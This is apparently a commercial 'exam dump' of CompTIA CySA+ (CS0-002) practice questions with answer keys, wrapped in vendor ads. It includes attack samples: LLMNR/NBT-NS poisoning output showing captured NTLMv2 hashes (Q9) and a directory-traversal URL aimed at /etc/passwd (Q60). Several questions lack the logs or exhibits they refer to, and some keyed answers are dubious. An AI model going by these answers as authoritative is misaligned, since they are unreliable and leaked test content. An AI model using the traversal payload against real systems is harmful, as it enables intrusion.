Comptia CS0-002 May 2023-v1.5

CCIEHOMER We provide Pratice Test's in PDF and VCE format.
FREE VCE PLAYER
CompTIA Cybersecurity Analyst (CySA+)
Exam Name: CompTIA Cybersecurity Analyst (CySA+)

Exam Code: CS0-002
Exam Price: $392 (USD)
Duration: 165 minutes
Number of Questions: 85
Passing Score: 750/900
Get Latest & Actual Exam's Question and Answers from © Homer CO., LTD. We cover ALL Cisco and Non-Cisco Exam
Dumps. Cisco Written & LAB Dump Comptia, AWS, Azure, Oracle, Huawei, Aruba, Fortinet, F5 101, 201, CEHv1x, Palo
Alto, Check Point, EC Council and many more.
"We make sale ONLY if the dump is stable" Contact us: cciehomer@gmail.com Whatsapp +1-302-440-1843 or
homerwilliams@cciehomer.com
Developed by: Hussain & Evan

Dump Vendor: Homer Co., Ltd.
Website: COMING SOON
Contact us: cciehomer@gmail.com or homerwilliams@cciehomer.com
© 2018 Homer Co., Ltd.
Get Latest & Actual Exam's Question and Answers from © Homer CO., LTD. We cover ALL Cisco and Non-Cisco Exam Dumps.
Cisco Written & CCIE LAB Dump, AWS, Azure, Oracle, Huawei, Aruba, Fortinet, F5 101 & F5 201, RedHat Linux, Comptia, CEHv11, Palo Alto, Check Point, EC Council and many more.
CCIEHOMER "We make sale ONLY if the dump is stable" Contact us: cciehomer@gmail.com Whatsapp +1-302-440-1843 homerwilliams@cciehomer.com
CCIEHOMER We provide Pratice Test's in PDF and VCE format. FREE VCE PLAYER
QUESTION 1
Which of the following is the software development process by which function, usability, and scenarios are tested against a known set of base
requirements?
A. Security regression testing

B. Code review
C. User acceptance testing
D. Stress testing
Correct Answer: C
QUESTION 2
A security analyst discovers the following firewall log entries during an incident:
Which of the following is MOST likely occurring?
A. Banner grabbing
B. Port scanning
C. Beaconing
D. Data exfiltration
Correct Answer: B
QUESTION 3
A security analyst is revising a company's MFA policy to prohibit the use of short message service (SMS) tokens. The Chief Information Officer has
questioned this decision and asked for justification. Which of the following should the analyst provide as justification for the new policy?
A. SMS relies on untrusted, third-party carrier networks.

B. SMS tokens are limited to eight numerical characters.
C. SMS is not supported on all handheld devices in use.
D. SMS is a cleartext protocol and does not support encryption.
Correct Answer: D
QUESTION 4
During an incident response procedure, a security analyst collects a hard drive to analyze a possible vector of compromise. There is a Linux swap
partition on the hard drive that needs to be checked. Which of the following should the analyst use to extract human-readable content from the partition?
A. strings
B. head
C. fsstat
D. dd
Correct Answer: A
QUESTION 5
A consultant is evaluating multiple threat intelligence feeds to assess potential risks for a client. Which of the following is the BEST approach for the
consultant to consider when modeling the client's attack surface?
A. Ask for external scans from industry peers, look at the open ports, and compare information with the client.
B. Discuss potential tools the client can purchase to reduce the likelihood of an attack.
C. Look at attacks against similar industry peers and assess the probability of the same attacks happening.
D. Meet with the senior management team to determine if funding is available for recommended solutions.
Correct Answer: C
QUESTION 6
SIMULATION -
You are a penetration tester who is reviewing the system hardening guidelines for a company's distribution center. The company's hardening guidelines
indicate the following:
There must be one primary server or service per device.
Only default ports should be used.
Non-secure protocols should be disabled.
The corporate Internet presence should be placed in a protected subnet.
INSTRUCTIONS -
Using the tools available, discover devices on the corporate network and the services that are running on these devices.
You must determine:

The IP address of each device.
The primary server or service of each device.
The protocols that should be disabled based on the hardening guidelines. If at any time you would like to bring back the initial state of the simulation,
please click the Reset All button.
A. Answer: See explanation below.
B.
C.
D.
Correct Answer: A
QUESTION 7
A development team has asked users to conduct testing to ensure an application meets the needs of the business. Which of the following types of
testing does this describe?
A. Acceptance testing
B. Stress testing
C. Regression testing
D. Penetration testing
Correct Answer: A
QUESTION 8
An analyst receives artifacts from a recent intrusion and is able to pull a domain, IP address, email address, and software version. Which of the following
points of the Diamond Model of Intrusion Analysis does this intelligence represent?
A. Infrastructure
B. Capabilities
C. Adversary
D. Victims
Correct Answer: A
QUESTION 9
While conducting a network infrastructure review, a security analyst discovers a laptop that is plugged into a core switch and hidden behind a desk. The
analyst sees the following on the laptop's screen:
[*] [NBT-NS] Poisoned answer sent to 192.169.23.115 for name FILE-SHARE-A (service:
File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.23.115 for name FILE-SHARE-A [*] [LLMNR] Poisoned answer sent to 192.168.23.115 for name FILE-
SHARE-A [SMBv2] NTLMv2-SSP Client : 192.168.23.115
[SMBv2] NTLMv2-SSP Username : CORP\jsmith
[SMBv2] NTLMv2-SSP Hash : F5DBF769CFEA7...
[*] [NBT-NS] Poisoned answer sent to 192.169.23.24 for name FILE-SHARE-A (service:
File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.23.24 for name FILE-SHARE-A [*] [LLMNR] Poisoned answer sent to 192.168.23.24 for name FILE-
SHARE-A [SMBv2] NTLMv2-SSP Client : 192.168.23.24
[SMBv2] NTLMv2-SSP Username : CORP\progers

[SMBv2] NTLMv2-SSP Hash : 6D093BE2FDD70A...
Which of the following is the BEST action for the security analyst to take?
A. Force all users in the domain to change their passwords at the next login.
B. Disconnect the laptop and ask the users jsmith and progers to log out.
C. Take the FILE-SHARE-A server offline and scan it for viruses.
D. Initiate a scan of devices on the network to find password-cracking tools.
Correct Answer: B
QUESTION 10
A Chief Executive Officer (CEO) is concerned the company will be exposed to data sovereignty issues as a result of some new privacy regulations. To
help mitigate this risk, the Chief Information Security Officer (CISO) wants to implement an appropriate technical control. Which of the following would
meet the requirement?
A. Data masking procedures

B. Enhanced encryption functions
C. Regular business impact analysis functions
D. Geographic access requirements
Correct Answer: D
QUESTION 11
Which of the following is a difference between SOAR and SCAP?
A. SOAR can be executed faster and with fewer false positives than SCAP because of advanced heuristics.
B. SOAR has a wider breadth of capability using orchestration and automation, while SCAP is more limited in scope.
C. SOAR is less expensive because process and vulnerability remediation is more automated than what SCAP does.
D. SOAR eliminates the need for people to perform remediation, while SCAP relies heavily on security analysts.
Correct Answer: B
QUESTION 12
An organization has a policy that requires servers to be dedicated to one function and unneeded services to be disabled. Given the following output from
an Nmap scan of a web server:
Which of the following ports should be closed?
A. 21
B. 80
C. 443
D. 1433
Correct Answer: D
QUESTION 13
An organization is upgrading its network and all of its workstations. The project will occur in phases, with infrastructure upgrades each month and
workstation installs every other week. The schedule should accommodate the enterprise-wide changes, while minimizing the impact to the network.
Which of the following schedules BEST addresses these requirements?
A. Monthly vulnerability scans, biweekly topology scans, daily host discovery scans
B. Monthly topology scans, biweekly host discovery scans, monthly vulnerability scans
C. Monthly host discovery scans, biweekly vulnerability scans, monthly topology scans
D. Monthly topology scans, biweekly host discovery scans, weekly vulnerability scans
Correct Answer: B
QUESTION 14
SIMULATION -
Malware is suspected on a server in the environment. The analyst is provided with the output of commands from servers in the environment and needs
to review all output files in order to determine which process running on one of the servers may be malware.
INSTRUCTIONS -
Servers 1, 2, and 4 are clickable. Select the Server and the process that host the malware. If at any time you would like to bring back the initial state of
the simulation, please click the Reset All button.

Server 4, Svchost.exe -
B.
C.
D.
Correct Answer: A
QUESTION 15
While reviewing incident reports from the previous night, a security analyst notices the corporate websites were defaced with political propaganda.
Which of the following BEST describes this type of actor?
A. Hacktivist
B. Nation-state
C. Insider threat
D. Organized crime
Correct Answer: A
QUESTION 16
A security analyst is performing a Diamond Model analysis of an incident the company had last quarter. A potential benefit of this activity is that it can
identify:
A. detection and prevention capabilities to improve.

B. which systems were exploited more frequently.
C. possible evidence that is missing during forensic analysis.
D. which analysts require more training.
E. the time spent by analysts on each of the incidents.
Correct Answer: A
QUESTION 17
An IT security analyst has received an email alert regarding a vulnerability within the new fleet of vehicles the company recently purchased. Which of the
following attack vectors is the vulnerability MOST likely targeting?
A. SCADA
B. CAN bus
C. Modbus
D. IoT
Correct Answer: B
QUESTION 18
An internally developed file-monitoring system identified the following excerpt as causing a program to crash often: char filedata[100]; fp = fopen
(`access.log`, `r`); srtcopy (filedata, fp); printf (`%s\n`, filedata);
Which of the following should a security analyst recommend to fix the issue?
A. Open the access.log file in read/write mode.

B. Replace the strcpy function.
C. Perform input sanitization.
D. Increase the size of the file data butter.
Correct Answer: B
QUESTION 19
A company's legal and accounting teams have decided it would be more cost-effective to offload the risks of data storage to a third party. The IT
management team has decided to implement a cloud model and has asked the security team for recommendations. Which of the following will allow all
data to be kept on the third-party network?
A. VDI
B. SaaS
C. CASB
D. FaaS
Correct Answer: B
QUESTION 20
A security analyst discovers suspicious host activity while performing monitoring activities. The analyst pulls a packet capture for the activity and sees
the following:
Follow TCP stream:
Which of the following describes what has occurred?
A. The host attempted to download an application from utoftor.com.

B. The host downloaded an application from utoftor.com.
C. The host attempted to make a secure connection to utoftor.com.
D. The host rejected the connection from utoftor.com.
Correct Answer: B
QUESTION 21
A security team implemented a SIEM as part of its security-monitoring program. There is a requirement to integrate a number of sources into the SIEM
to provide better context relative to the events being processed. Which of the following BEST describes the result the security team hopes to accomplish
by adding these sources?
A. Data enrichment
B. Continuous integration
C. Machine learning
D. Workflow orchestration
Correct Answer: A
QUESTION 22
Which of the following organizational initiatives would be MOST impacted by data sovereignty issues?
A. Moving to a cloud-based environment
B. Migrating to locally hosted virtual servers

C. Implementing non-repudiation controls
D. Encrypting local database queries
Correct Answer: A
QUESTION 23
A help desk technician inadvertently sent the credentials of the company's CRM in cleartext to an employee's personal email account. The technician
then reset the employee's account using the appropriate process and the employee's corporate email, and notified the security team of the incident.
According to the incident response procedure, which of the following should the security team do NEXT?
A. Contact the CRM vendor.

B. Prepare an incident summary report.
C. Perform postmortem data correlation.
D. Update the incident response plan.
Correct Answer: B
QUESTION 24
Which of the following is MOST dangerous to the client environment during a vulnerability assessment/penetration test?
A. There is a longer period of time to assess the environment.

B. The testing is outside the contractual scope.
C. There is a shorter period of time to assess the environment.
D. No status reports are included with the assessment.
Correct Answer: B
QUESTION 25
An organization is adopting IoT devices at an increasing rate and will need to account for firmware updates in its vulnerability management programs.
Despite the number of devices being deployed, the organization has only focused on software patches so far, leaving hardware-related weaknesses
open to compromise.
Which of the following best practices will help the organization to track and deploy trusted firmware updates as part of its vulnerability management
programs?
A. Utilize threat intelligence to guide risk evaluation activities and implement critical updates after proper testing.
B. Apply all firmware updates as soon as they are released to mitigate the risk of compromise.
C. Sign up for vendor emails and create firmware update change plans for affected devices.
D. Implement an automated solution that detects when vendors release firmware updates and immediately deploy updates to production.
Correct Answer: A
QUESTION 26
A company's blocklist has outgrown the current technologies in place. The ACLs are at maximum, and the IPS signatures only allow a certain amount of
space for domains to be added, creating the need for multiple signatures. Which of the following configuration changes to the existing controls would be
the MOST appropriate to improve performance?
A. Implement a host-file-based solution that will use a list of all domains to deny for all machines on the network.
B. Create an IDS for the current blocklist to determine which domains are showing activity and may need to be removed.
C. Review the current blocklist and prioritize it based on the level of threat severity. Add the domains with the highest severity to the blocklist and
remove the lower- severity threats from it.
D. Review the current blocklist to determine which domains can be removed from the list and then update the ACLs and IPS signatures.
Correct Answer: C
QUESTION 27
HOTSPOT -
A security analyst suspects that a workstation may be beaconing to a command and control server.
Inspect the logs from the company's web proxy server and the firewall to determine the best course of action to take in order to neutralize the threat with
minimum impact to the organization.
INSTRUCTIONS -
Modify the Firewall Access Control rule to mitigate the issue. If at any time you would like to bring back the initial state of the simulation, please click the
Reset All button.
Hot Area:
A.
B.
C.
D.
Correct Answer: A
QUESTION 28
SIMULATION -
Approximately 100 employees at your company have received a phishing email. As a security analyst, you have been tasked with handling this situation.
INSTRUCTIONS -
Review the information provided and determine the following:
1. How many employees clicked on the link in the phishing email?
2. On how many workstations was the malware installed?
3. What is the executable file name of the malware?
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
B.
C.
D.
Correct Answer: A
QUESTION 29
A company is experiencing a malware attack within its network. A security engineer notices many of the impacted assets are connecting outbound to a
number of remote destinations and exfiltrating data. The security engineer also sees that deployed, up-to-date antivirus signatures are ineffective. Which
of the following is the BEST approach to prevent any impact to the company from similar attacks in the future?
A. IDS signatures
B. Data loss prevention
C. Port security
D. Sinkholing
Correct Answer: B
QUESTION 30
The steering committee for information security management annually reviews the security incident register for the organization to look for trends and
systematic issues. The steering committee wants to rank the risks based on past incidents to improve the security program for next year. Below is the
incident register for the organization:
Which of the following should the organization consider investing in FIRST due to the potential impact of availability?
A. Hire a managed service provider to help with vulnerability management

B. Build a warm site in case of system outages
C. Invest in a failover and redundant system, as necessary
D. Hire additional staff for the IT department to assist with vulnerability management and log review
Correct Answer: C
QUESTION 31
The IT department is concerned about the possibility of a guest device infecting machines on the corporate network or taking down the company's single
Internet connection. Which of the following should a security analyst recommend to BEST meet the requirements outlined by the IT department?
A. Require the guest machines to install the corporate-owned EDR solution

B. Configure NAC to only allow machines on the network that are patched and have active antivirus
C. Place a firewall in between the corporate network and the guest network
D. Configure the IPS with rules that will detect common malware signatures traveling from the guest network
Correct Answer: B
QUESTION 32
Following a recent security breach, a company decides to investigate account usage to ensure privileged accounts are only being utilized during typical
business hours. During the investigation, a security analyst determines an account was consistently utilized in the middle of the night. Which of the
following actions should the analyst take NEXT?
A. Disable the privileged account.

B. Initiate the incident response plan.
C. Report the discrepancy to human resources.
D. Review the activity with the user.
Correct Answer: D
QUESTION 33
Which of the following are reasons why consumer IoT devices should be avoided in an enterprise environment? (Choose two.)
A. Message queuing telemetry transport does not support encryption.

B. The devices may have weak or known passwords.
C. The devices may cause a dramatic increase in wireless network traffic.
D. The devices may utilize unsecure network protocols.
E. Multiple devices may interfere with the functions of other IoT devices.
F. The devices are not compatible with TLS 1.2.
Correct Answer: BD
QUESTION 34
In response to an audit finding, a company's Chief Information Officer (CIO) instructed the security department to increase the security posture of the
vulnerability management program. Currently, the company's vulnerability management program has the following attributes:
It is unauthenticated.
It is at the minimum interval specified by the audit framework.
It only scans well-known ports.
Which of the following would BEST increase the security posture of the vulnerability management program?
A. Expand the ports being scanned to include all ports. Increase the scan interval to a number the business will accept without causing service
interruption. Enable authentication and perform credentialed scans.
B. Expand the ports being scanned to include all ports. Keep the scan interval at its current level. Enable authentication and perform credentialed
scans.
C. Expand the ports being scanned to include all ports. Increase the scan interval to a number the business will accept without causing service
interruption. Continue unauthenticated scanning.
D. Continue scanning the well-known ports. Increase the scan interval to a number the business will accept without causing service interruption. Enable
authentication and perform credentialed scans.
Correct Answer: A
QUESTION 35
A financial organization has offices located globally. Per the organization's policies and procedures, all executives who conduct business overseas must
have their mobile devices checked for malicious software or evidence of tampering upon their return. The information security department oversees this
process, and no executive has had a device compromised. The Chief Information Security Officer wants to implement an additional safeguard to protect
the organization's data.
Which of the following controls would work BEST to protect the privacy of the data if a device is stolen?
A. Implement a mobile device wiping solution for use if a device is lost or stolen.
B. Install a DLP solution to track data flow.
C. Install an encryption solution on all mobile devices.
D. Train employees to report a lost or stolen laptop to the security department immediately.
Correct Answer: C
QUESTION 36
A software development team asked a security analyst to review some code for security vulnerabilities. Which of the following would BEST assist the
security analyst while performing this task?
A. Static analysis
B. Dynamic analysis
C. Regression testing
D. User acceptance testing
Correct Answer: A
QUESTION 37
A security analyst inspects the header of an email that is presumed to be malicious and sees the following:
Which of the following is inconsistent with the rest of the header and should be treated as suspicious?
A. The use of a TLS cipher

B. The sender's email address
C. The destination email server
D. The subject line
Correct Answer: B
QUESTION 38
A team of network security analysts is examining network traffic to determine if sensitive data was exfiltrated. Upon further investigation, the analysts
believe confidential data was compromised. Which of the following capabilities would BEST defend against this type of sensitive data exfiltration?
A. Deploy an edge firewall.

B. Implement DLP.
C. Deploy EDR.
D. Encrypt the hard drives.
Correct Answer: B
QUESTION 39
After a series of Group Policy Object updates, multiple services stopped functioning. The systems administrator believes the issue resulted from a
Group Policy Object update but cannot validate which update caused the issue. Which of the following security solutions would resolve this issue?
A. Privilege management
B. Group Policy Object management
C. Change management
D. Asset management
Correct Answer: C
QUESTION 40
Which of the following describes the main difference between supervised and unsupervised machine-learning algorithms that are used in cybersecurity
applications?
A. Supervised algorithms can be used to block attacks, while unsupervised algorithms cannot.
B. Supervised algorithms require security analyst feedback, while unsupervised algorithms do not.
C. Unsupervised algorithms are not suitable for IDS systems, while supervised algorithms are.
D. Unsupervised algorithms produce more false positives than supervised algorithms.
Correct Answer: B
QUESTION 41
The SOC has received reports of slowness across all workstation network segments. The currently installed antivirus has not detected anything, but a
different anti-malware product was just downloaded and has revealed a worm is spreading. Which of the following should be the NEXT step in this
incident response?
A. Send a sample of the malware to the antivirus vendor and request urgent signature creation.
B. Begin deploying the new anti-malware on all uninfected systems.
C. Enable an ACL on all VLANs to contain each segment.
D. Compile a list of IoCs so the IPS can be updated to halt the spread.
Correct Answer: D
QUESTION 42
A vulnerability assessment solution is hosted in the cloud. This solution will be used as an accurate inventory data source for both the configuration
management database and the governance, risk, and compliance tool. An analyst has been asked to automate the data acquisition. Which of the
following would be the BEST way to acquire the data?
A. CSV export
B. SOAR
C. API
D. Machine learning
Correct Answer: C
QUESTION 43
Which of the following is MOST closely related to the concept of privacy?
A. The implementation of confidentiality, integrity, and availability

B. A system's ability to protect the confidentiality of sensitive information
C. An individual's control over personal information
D. A policy implementing strong identity management processes
Correct Answer: C
QUESTION 44
An organization is focused on restructuring its data governance programs, and an analyst has been tasked with surveying sensitive data within the
organization. Which of the following is the MOST accurate method for the security analyst to complete this assignment?
A. Perform an enterprise-wide discovery scan.

B. Consult with an internal data custodian.
C. Review enterprise-wide asset inventory.
D. Create a survey and distribute it to data owners.
Correct Answer: D
QUESTION 45
Which of the following is the BEST security practice to prevent ActiveX controls from running malicious code on a user's web application?
A. Deploying HIPS to block malicious ActiveX code

B. Installing network-based IPS to block malicious ActiveX code
C. Adjusting the web-browser settings to block ActiveX controls
D. Configuring a firewall to block traffic on ports that use ActiveX controls
Correct Answer: C
QUESTION 46
A company wants to ensure confidential data from its storage media files is sanitized so the drives cannot be reused. Which of the following is the BEST
approach?
A. Degaussing
B. Shredding
C. Formatting
D. Encrypting
Correct Answer: B
QUESTION 47
During the forensic analysis of a compromised machine, a security analyst discovers some binaries that are exhibiting abnormal behaviors. After
extracting the strings, the analyst finds unexpected content. Which of the following is the NEXT step the analyst should take?
A. Validate the binaries' hashes from a trusted source.

B. Use file integrity monitoring to validate the digital signature.
C. Run an antivirus against the binaries to check for malware.
D. Only allow whitelisted binaries to execute.
Correct Answer: A
QUESTION 48
An organization recently discovered that spreadsheet files containing sensitive financial data were improperly stored on a web server. The management
team wants to find out if any of these files were downloaded by public users accessing the server. The results should be written to a text file and should
include the date, time, and IP address associated with any spreadsheet downloads. The web server's log file is named webserver.log, and the report file
name should be accessreport.txt. Following is a sample of the web server's log file:
Which of the following commands should be run if an analyst only wants to include entries in which a spreadsheet was successfully downloaded?
A. more webserver.log | grep *.xls > accessreport.txt

B. more webserver.log > grep *xls | egrep "E 'success' > accessreport.txt
C. more webserver.log | grep "E return=200 | xls > accessreport.txt
D. more webserver.log | grep "A *.xls < accessreport.txt
Correct Answer: C
QUESTION 49
A security analyst is running a tool against an executable of an unknown source. The input supplied by the tool to the executable program and the output
from the executable are shown below:
Which of the following should the analyst report after viewing this information?
A. A dynamic library that is needed by the executable is missing.

B. Input can be crafted to trigger an injection attack in the executable.
C. The tool caused a buffer overflow in the executable's memory.
D. The executable attempted to execute a malicious command.
Correct Answer: B
QUESTION 50
A Chief Information Security Officer (CISO) is concerned about new privacy regulations that apply to the company. The CISO has tasked a security
analyst with finding the proper control functions to verify that a user's data is not altered without the user's consent. Which of the following would be an
appropriate course of action?
A. Automate the use of a hashing algorithm after verified users make changes to their data.
B. Use encryption first and then hash the data at regular, defined times.
C. Use a DLP product to monitor the data sets for unauthorized edits and changes.
D. Replicate the data sets at regular intervals and continuously compare the copies for unauthorized changes.
Correct Answer: C
QUESTION 51
An employee was found to have performed fraudulent activities. The employee was dismissed, and the employee's laptop was sent to the IT service
desk to undergo a data sanitization procedure. However, the security analyst responsible for the investigation wants to avoid data sanitization. Which of
the following can the security analyst use to justify the request?
A. GDPR
B. Data correlation procedure
C. Evidence retention
D. Data retention
Correct Answer: C
QUESTION 52
As part of an intelligence feed, a security analyst receives a report from a third-party trusted source. Within the report are several domains and
reputational information that suggest the company's employees may be targeted for a phishing campaign. Which of the following configuration changes
would be the MOST appropriate for intelligence gathering?
A. Update the whitelist.

B. Develop a malware signature.
C. Sinkhole the domains.
D. Update the blacklist.
Correct Answer: C
QUESTION 53
A security analyst conducted a risk assessment on an organization's wireless network and identified a high-risk element in the implementation of data
confidentiality protection. Which of the following is the BEST technical security control to mitigate this risk?
A. Switch to RADIUS technology.

B. Switch to TACACS+ technology.
C. Switch to MAC filtering.
D. Switch to the WPA2 protocol.
Correct Answer: D
QUESTION 54
Which of the following sources will provide the MOST relevant threat intelligence data to the security team of a dental care network?
A. H-ISAC
B. Dental forums
C. Open threat exchange
D. Dark web chatter
Correct Answer: A
QUESTION 55
Which of the following incident response components can identify who is the liaison between multiple lines of business and the public?
A. Red-team analysis
B. Escalation process and procedures
C. Triage and analysis
D. Communications plan
Correct Answer: D
QUESTION 56
Which of the following threat classifications would MOST likely use polymorphic code?
A. Known threat
B. Zero-day threat
C. Unknown threat
D. Advanced persistent threat
Correct Answer: A
QUESTION 57
A company has a cluster of web servers that is critical to the business. A systems administrator installed a utility to troubleshoot an issue, and the utility
caused the entire cluster to go offline. Which of the following solutions would work BEST prevent to this from happening again?
A. Change management
B. Application whitelisting
C. Asset management
D. Privilege management
Correct Answer: A
QUESTION 58
An analyst must review a new cloud-based SIEM solution. Which of the following should the analyst do FIRST prior to discussing the company's needs?
A. Check industry news feeds for product reviews.

B. Ensure a current non-disclosure agreement is on file.
C. Perform a vulnerability scan against a test instance.
D. Download the product security white paper.
Correct Answer: B
QUESTION 59
A small organization has proprietary software that is used internally. The system has not been well maintained and cannot be updated with the rest of
the environment. Which of the following is the BEST solution?
A. Virtualize the system and decommission the physical machine.

B. Remove it from the network and require air gapping.
C. Implement privileged access management for identity access.
D. Implement MFA on the specific system.
Correct Answer: B
QUESTION 60
A SIEM analyst receives an alert containing the following URL:
http:/companywebsite.com/displayPicture?filenamE=../../../../etc/passwd Which of the following BEST describes the attack?
A. Password spraying
B. Buffer overflow
C. Insecure object access
D. Directory traversal
Correct Answer: D
QUESTION 61
Which of the following is the BEST way to gather patch information on a specific server?
A. Event Viewer
B. Custom script
C. SCAP software
D. CI/CD
Correct Answer: C
QUESTION 62
A security analyst reviews SIEM logs and discovers the following error event:
Which of the following environments does the analyst need to examine to continue troubleshooting the event?
A. Proxy server
B. SQL server
C. Windows domain controller
D. WAF appliance
E. DNS server
Correct Answer: E
QUESTION 63
A security analyst needs to develop a brief that will include the latest incidents and the attack phases of the incidents. The goal is to support threat
intelligence and identify whether or not the incidents are linked. Which of the following methods would be MOST appropriate to use?
A. The Cyber Kill Chain

B. The MITRE ATT&CK framework
C. An adversary capability model
D. The Diamond Model of Intrusion Analysis
Correct Answer: A
QUESTION 64
A security analyst is handling an incident in which ransomware has encrypted the disks of several company workstations. Which of the following would
work BEST to prevent this type of incident in the future?
A. Implement a UTM instead of a stateful firewall and enable gateway antivirus.

B. Back up the workstations to facilitate recovery and create a gold image.
C. Establish a ransomware awareness program and implement secure and verifiable backups.
D. Virtualize all the endpoints with daily snapshots of the virtual machines.
Correct Answer: C
QUESTION 65
A computer hardware manufacturer is developing a new SoC that will be used by mobile devices. The SoC should not allow users or the process to
downgrade from a newer firmware to an older one. Which of the following can the hardware manufacturer implement to prevent firmware downgrades?
A. Encryption
B. eFuse
C. Secure Enclave
D. Trusted execution
Correct Answer: B
QUESTION 66
An information security analyst on a threat-hunting team is working with administrators to create a hypothesis related to an internally developed web
application.
The working hypothesis is as follows:
Due to the nature of the industry, the application hosts sensitive data associated with many clients and is a significant target.
The platform is most likely vulnerable to poor patching and inadequate server hardening, which expose vulnerable services.
The application is likely to be targeted with SQL injection attacks due to the large number of reporting capabilities within the application. As a result, the
systems administrator upgrades outdated service applications and validates the endpoint configuration against an industry benchmark. The analyst
suggests developers receive additional training on implementing identity and access management, and also implements a WAF to protect against SQL
injection attacks. Which of the following BEST represents the technique in use?
A. Improving detection capabilities

B. Bundling critical assets
C. Profiling threat actors and activities
D. Reducing the attack surface area
Correct Answer: D
QUESTION 67
A security analyst is scanning the network to determine if a critical security patch was applied to all systems in an enterprise. The organization has a very
low tolerance for risk when it comes to resource availability. Which of the following is the BEST approach for configuring and scheduling the scan?
A. Make sure the scan is credentialed, covers all hosts in the patch management system, and is scheduled during business hours so it can be
terminated if it affects business operations.
B. Make sure the scan is uncredentialed, covers all hosts in the patch management system, and is scheduled during off-business hours so it has the
least impact on operations.
C. Make sure the scan is credentialed, has the latest software and signature versions, covers all external hosts in the patch management system, and
is scheduled during off-business hours so it has the least impact on operations.
D. Make sure the scan is credentialed, uses a limited plug-in set, scans all host IP addresses in the enterprise, and is scheduled during off-business
hours so it has the least impact on operations.
Correct Answer: D
QUESTION 68
A security analyst is looking at the headers of a few emails that appear to be targeting all
users at an organization:
Which of the following technologies would MOST likely be used to prevent this phishing attempt?
A. DNSSEC
B. DMARC
C. STP
D. S/IMAP
Correct Answer: B
QUESTION 69
A developer downloaded and attempted to install a file transfer application in which the installation package is bundled with adware. The next-generation
antivirus software prevented the file from executing, but it did not remove the file from the device. Over the next few days, more developers tried to
download and execute the offending file. Which of the following changes should be made to the security tools to BEST remedy the issue?
A. Blacklist the hash in the next-generation antivirus system.

B. Manually delete the file from each of the workstations.
C. Remove administrative rights from all developer workstations.
D. Block the download of the file via the web proxy.
Correct Answer: D
QUESTION 70
A newly appointed Chief Information Security Officer has completed a risk assessment review of the organization and wants to reduce the numerous
risks that were identified. Which of the following will provide a trend of risk mitigation?
A. Planning
B. Continuous monitoring
C. Risk response
D. Risk analysis
E. Oversight
Correct Answer: C
QUESTION 71
Which of the following allows Secure Boot to be enabled?
A. eFuse
B. UEFI
C. HSM
D. PAM
Correct Answer: B
QUESTION 72
A company stores all of its data in the cloud. All company-owned laptops are currently unmanaged, and all users have administrative rights. The security
team is having difficulty identifying a way to secure the environment. Which of the following would be the BEST method to protect the company's data?
A. Implement UEM on all systems and deploy security software.

B. Implement DLP on all workstations and block company data from being sent outside the company.
C. Implement a CASB and prevent certain types of data from being downloaded to a workstation.
D. Implement centralized monitoring and logging for all company systems.
Correct Answer: C
QUESTION 73
A security analyst is reviewing a vulnerability scan report and notes the following finding:
As part of the detection and analysis procedures, which of the following should the analyst do NEXT?
A. Patch or reimage the device to complete the recovery.

B. Restart the antiviruses running processes.
C. Isolate the host from the network to prevent exposure.
D. Confirm the workstation's signatures against the most current signatures.
Correct Answer: D
QUESTION 74
After a remote command execution incident occurred on a web server, a security analyst found the following piece of code in an XML file:
Which of the following is the BEST solution to mitigate this type of attack?
A. Implement a better level of user input filters and content sanitization.

B. Properly configure XML handlers so they do not process &ent parameters coming from user inputs.
C. Use parameterized queries to avoid user inputs from being processed by the server.
D. Escape user inputs using character encoding conjoined with whitelisting.
Correct Answer: B
QUESTION 75
A security analyst is generating a list of recommendations for the company's insecure API. Which of the following is the BEST parameter mitigation
recommendation?
A. Use TLS for all data exchanges.

B. Use effective authentication and authorization methods.
C. Implement parameterized queries.
D. Validate all incoming data.
Correct Answer: B
QUESTION 76
A company recently experienced a breach of sensitive information that affects customers across multiple geographical regions. Which of the following
roles would be BEST suited to determine the breach notification requirements?
A. Legal counsel
B. Chief Security Officer
C. Human resources
D. Law enforcement
Correct Answer: A
QUESTION 77
A security analyst identified some potentially malicious processes after capturing the contents of memory from a machine during incident response.
Which of the following procedures is the NEXT step for further investigation?
A. Data carving
B. Timeline construction
C. File cloning
D. Reverse engineering
Correct Answer: D
QUESTION 78
Understanding attack vectors and integrating intelligence sources are important components
of:
A. a vulnerability management plan.

B. proactive threat hunting.
C. risk management compliance.
D. an incident response plan.
Correct Answer: B
QUESTION 79
A business recently acquired a software company. The software company's security posture is unknown. However, based on an initial assessment,
there are limited security controls. No significant security monitoring exists. Which of the following is the NEXT step that should be completed to obtain
information about the software company's security posture?
A. Develop an asset inventory to determine the systems within the software company.
B. Review relevant network drawings, diagrams, and documentation.
C. Perform penetration tests against the software company's internal and external networks.
D. Baseline the software company's network to determine the ports and protocols in use.
Correct Answer: A
QUESTION 80
A security analyst identified one server that was compromised and used as a data mining machine, and a clone of the hard drive that was created.
Which of the following will MOST likely provide information about when and how the machine was compromised and where the malware is located?
A. System timeline reconstruction

B. System registry extraction
C. Data carving
D. Volatile memory analysis
Correct Answer: A
QUESTION 81
A security analyst is researching ways to improve the security of a company's email system to mitigate emails that are impersonating company
executives. Which of the following would be BEST for the analyst to configure to achieve this objective?
A. A TXT record on the name server for SPF

B. DNSSEC keys to secure replication
C. Domain Keys Identified Mail
D. A sandbox to check incoming mail
Correct Answer: C
QUESTION 82
During an investigation, a security analyst determines suspicious activity occurred during the night shift over the weekend. Further investigation reveals
the activity was initiated from an internal IP going to an external website. Which of the following would be the MOST appropriate recommendation to
prevent similar activity from happening in the future?
A. An IPS signature modification for the specific IP addresses

B. An IDS signature modification for the specific IP addresses
C. A firewall rule that will block port 80 traffic
D. Implement a web proxy to restrict malicious web content
Correct Answer: D
QUESTION 83
A company frequently experiences issues with credential stuffing attacks. Which of the following is the BEST control to help prevent these attacks from
being successful?
A. SIEM
B. IDS
C. MFA
D. TLS
Correct Answer: C
QUESTION 84
Company A is in the process of merging with Company B. As part of the merger, connectivity between the ERP systems must be established so
pertinent financial information can be shared between the two entities. Which of the following will establish a more automated approach to secure data
transfers between the two entities?
A. Set up an FTP server that both companies can access and export the required financial data to a folder.
B. Set up a VPN between Company A and Company B, granting access only to the ERPs within the connection.
C. Set up a PKI between Company A and Company B and intermediate shared certificates between the two entities.
D. Create static NATs on each entity's firewalls that map to the ERR systems and use native ERP authentication to allow access.
Correct Answer: B
QUESTION 85
After an incident involving a phishing email, a security analyst reviews the following email access log:
